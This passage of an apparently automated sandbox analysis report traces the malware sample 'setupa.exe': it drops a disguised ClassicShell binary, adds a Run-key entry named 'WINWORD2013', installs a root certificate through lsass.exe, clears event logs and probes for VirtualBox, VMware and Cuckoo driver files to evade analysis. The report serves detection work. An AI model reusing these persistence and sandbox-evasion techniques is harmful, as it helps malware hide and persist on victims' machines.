                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptprov.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\Public\Documents\upupoo-classicshell.exeSection loaded: classicstartmenudll.dllJump to behavior
                      Source: C:\Users\Public\Documents\upupoo-classicshell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dinput8.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: inputhost.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: devenum.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msdmo.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\setupa.exeDirectory created: C:\Program Files\ClassicStartMenuDLL.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeDirectory created: C:\Program Files\upup.oxJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeDirectory created: C:\Program Files\upupoo-classicshell.exeJump to behavior
                      Source: setupa.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: setupa.exeStatic PE information: Image base 0x140000000 > 0x60000000
                      Source: setupa.exeStatic file information: File size 1695232 > 1048576
                      Source: setupa.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x10a200
                      Source: setupa.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: \KinndigitDll\x64\Release\KinndigitDll.pdb source: setupa.exe, 00000000.00000003.2200525100.000001F5DCBB6000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, lsass.exe, 00000001.00000002.3348718884.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091116393.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp
                      Source: Binary string: c:\Users\Sware\Desktop\classic-shell\Classic-Shell-4.3.1\ClassicShellSrc\ClassicStartMenu\Setup\ClassicStartMenu.pdb source: upupoo-classicshell.exe, 00000003.00000000.2164624884.0000000000C33000.00000002.00000001.01000000.00000006.sdmp, upupoo-classicshell.exe, 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp, upupoo-classicshell.exe, 0000000B.00000002.2354492979.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp, upupoo-classicshell.exe, 0000000B.00000000.2254604894.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp, upupoo-classicshell.exe.0.dr
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF689641361 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,0_2_00007FF689641361
                      Source: setupa.exeStatic PE information: section name: .00cfg
                      Source: C:\Windows\System32\lsass.exeCode function: 1_2_00000140ADFD8235 push rsi; ret 1_2_00000140ADFD8236
                      Source: C:\Windows\System32\lsass.exeCode function: 1_2_00000140ADFD8BDD push rcx; retf 003Fh1_2_00000140ADFD8BDE
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_00C266C9 push ecx; ret 3_2_00C266DC
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_6E0A9316 push ecx; ret 3_2_6E0A9329
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_6E0A8172 push ecx; ret 3_2_6E0A8185
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_10004146 push ecx; ret 3_2_10004159
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02589E65 push ecx; ret 4_2_02589E78
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04E13470 push ebp; retf 4_2_04E13474
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04E1344B push ebp; retf 4_2_04E13474
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04E13450 push ebp; retf 4_2_04E13474
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04E1B0B8 push eax; ret 4_2_04E1B119
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04E1B168 push eax; ret 4_2_04E1B119
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04E04395 push ecx; ret 4_2_04E043A8
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02A09832 push ecx; ret 4_2_02A09845
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04C83D54 push ecx; ret 4_2_04C83D67
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04C92600 push ebp; retf 4_2_04C92633
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04C91AE4 push ss; iretd 4_2_04C91AF5
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04C91B07 push cs; iretd 4_2_04C91B08
                      Source: C:\Users\Public\Documents\upupoo-classicshell.exeCode function: 11_2_10004146 push ecx; ret 11_2_10004159
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_02F69E65 push ecx; ret 12_2_02F69E78
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052D3470 push ebp; retf 12_2_052D3474
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052D3447 push ebp; retf 12_2_052D3474
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052D3450 push ebp; retf 12_2_052D3474
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052DB168 push eax; ret 12_2_052DB119
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052DB0B8 push eax; ret 12_2_052DB119
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052C4395 push ecx; ret 12_2_052C43A8
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_02ED9832 push ecx; ret 12_2_02ED9845
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_05143D54 push ecx; ret 12_2_05143D67
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_05152600 push ebp; retf 12_2_05152633
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_05151B07 push cs; iretd 12_2_05151B08
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_05151AE4 push ss; iretd 12_2_05151AF5

Persistence and Installation Behavior

Source: C:\Windows\System32\lsass.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
Source: C:\Windows\System32\lsass.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
Source: C:\Windows\System32\lsass.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\lsass.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Users\user\Desktop\setupa.exe | File created: C:\Program Files\upupoo-classicshell.exe (dropped file)
Source: C:\Program Files\upupoo-classicshell.exe | File created: C:\Users\Public\Documents\upupoo-classicshell.exe (copy) (dropped file)
Source: C:\Program Files\upupoo-classicshell.exe | File created: C:\Users\Public\Documents\ClassicStartMenuDLL.dll (copy) (dropped file)
Source: C:\Users\user\Desktop\setupa.exe | File created: C:\Program Files\ClassicStartMenuDLL.dll (dropped file)
Source: C:\Users\user\Desktop\setupa.exe | File created: C:\Program Files\upupoo-classicshell.exe (dropped file)
Source: C:\Users\user\Desktop\setupa.exe | File created: C:\Program Files\ClassicStartMenuDLL.dll (dropped file)
Source: C:\Program Files\upupoo-classicshell.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WINWORD2013
Source: C:\Program Files\upupoo-classicshell.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WINWORD2013
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04DFB410 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog, 4_2_04DFB410
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF689644142 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00007FF689644142
Source: C:\Windows\System32\lsass.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Users\user\Desktop\setupa.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      Source: C:\Users\user\Desktop\setupa.exe | Code function: qemu qemu vbox vbox vbox avasvbox bitdoxvirttvboxvirtsandmalwvmwacuckavasvbox cuckavasvbox malwvmwacuckavasvbox sandmalwvmwacuckavasvbox virtsandmalwvmwacuckavasvbox vmwacuckavasvbox virttvboxvirtsandmalwvmwacuckavasvbox vbox vboxvirtsandmalwvmwacuckavasvbox 0_2_00007FF689642CDE
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\system32\VBoxSF.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\System32\WindowsPowerShell\v1.0\vmhgfs.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\system32\vmhgfs.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\vmmouse.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\System32\Wbem\vmci.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\System32\WindowsPowerShell\v1.0\VBoxSF.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\SYSTEM32\vmmouse.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\VBoxGuest.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\vmhgfs.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\VBoxSF.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Users\user\Desktop\vmmouse.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\system32\vmci.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\system32\VBoxGuest.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\vmci.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\System32\OpenSSH\VBoxGuest.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\system\VBoxGuest.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\VBoxSF.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\system\vmci.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\System32\OpenSSH\vmci.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\system\vmmouse.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\system32\vmmouse.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\vmmouse.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\SYSTEM32\VBoxGuest.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Users\user\Desktop\VBoxMouse.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\system32\VBoxMouse.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\System32\Wbem\VBoxGuest.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\VBoxGuest.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\vmci.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\VBoxMouse.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\System32\OpenSSH\vmmouse.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Users\user\Desktop\VBoxSF.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\System32\OpenSSH\VBoxSF.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\SYSTEM32\vmhgfs.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\SYSTEM32\VBoxMouse.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\System32\WindowsPowerShell\v1.0\vmmouse.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\system\vmhgfs.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\system\VBoxSF.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\VBoxMouse.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\SYSTEM32\vmci.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\vmhgfs.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Users\user\Desktop\vmci.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\VBoxSF.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\System32\WindowsPowerShell\v1.0\VBoxMouse.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\System32\Wbem\VBoxSF.sys
                      Source: C:\Users\user\Desktop\setupa.exe | File opened / queried: C:\Windows\System32\Wbem\VBoxMouse.sys
